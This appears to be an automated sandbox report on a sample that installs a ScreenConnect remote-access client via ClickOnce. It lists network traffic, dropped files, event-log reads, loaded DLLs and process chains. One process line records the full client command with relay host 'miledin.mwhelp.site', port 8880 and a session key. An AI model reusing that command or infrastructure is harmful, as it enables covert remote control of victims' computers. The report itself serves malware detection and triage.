                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63076 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63077
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownHTTPS traffic detected: 172.67.181.28:443 -> 192.168.2.4:49722 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4Jump to dropped file

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Reads the Security eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                  Reads the System eventlog
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior

                  System Summary

                  barindex
                  Detected potential unwanted application
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_0062A5E50_2_0062A5E5
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621BD40_2_00621BD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA7EE481_2_00007FFC3DA7EE48
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA7ACDB1_2_00007FFC3DA7ACDB
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4AF101_2_00007FFC3DA4AF10
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA589901_2_00007FFC3DA58990
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA7CAAD1_2_00007FFC3DA7CAAD
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA8BAD81_2_00007FFC3DA8BAD8
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA837B51_2_00007FFC3DA837B5
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA8941F1_2_00007FFC3DA8941F
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA614001_2_00007FFC3DA61400
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA723D11_2_00007FFC3DA723D1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA630711_2_00007FFC3DA63071
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA4FA211_2_00007FFC3DA4FA21
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA598891_2_00007FFC3DA59889
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA627B01_2_00007FFC3DA627B0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA412401_2_00007FFC3DA41240
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA531ED1_2_00007FFC3DA531ED
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeCode function: 1_2_00007FFC3DA461781_2_00007FFC3DA46178
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA675E79_2_00007FFC3DA675E7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA6FE759_2_00007FFC3DA6FE75
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA711D19_2_00007FFC3DA711D1
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA700D39_2_00007FFC3DA700D3
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DA714109_2_00007FFC3DA71410
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD52E519_2_00007FFC3DD52E51
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD565889_2_00007FFC3DD56588
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD47D489_2_00007FFC3DD47D48
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD4FCE99_2_00007FFC3DD4FCE9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD556A89_2_00007FFC3DD556A8
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD4B2309_2_00007FFC3DD4B230
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFC3DD4A0859_2_00007FFC3DD4A085
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll0.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engineClassification label: mal51.evad.winEXE@9/68@2/2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCode function: 0_2_00621000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00621000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8088
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7636
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeCommand line argument: dfshim0_2_00621000
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeVirustotal: Detection: 16%
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeReversingLabs: Detection: 26%
                  Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe"
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7636 -s 1304
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8088 -s 316
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=miledin.mwhelp.site&p=8880&k=BgIAAACkAABSU0ExAAgAAAEAAQC1BC7FdVJJFmJKDeQwCiJ3JJNEMl4x59nF7GGtNmjpuazxqDcF4oXznuaF7%2bPvugux9iQl0N%2fv66hQ12W0ZIEMc6tfjE3cMNDEOZODX53g06Q8bUHTzh2x%2f%2b%2bqrAZH38rwy8BEaezwgd3uPlgjgt802V5RYOIginnPSg2QEYJY4zP%2b13deRrkTtsV6UQI5iKxqWvcrjc%2fgnpsbKuxD%2f8jpqy4DtSBRMb9x3urpOt2zfLzMjV0lF10MnyNOj1gz6q1%2bFaQncjp2SQiX%2fLZxsoFe0atFkdojc3UhMzdhfUWSymENjpLdauviud8LLhJxAaEW8KIHkbGfg7iNE6VySqaj&r=&i=" "1"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
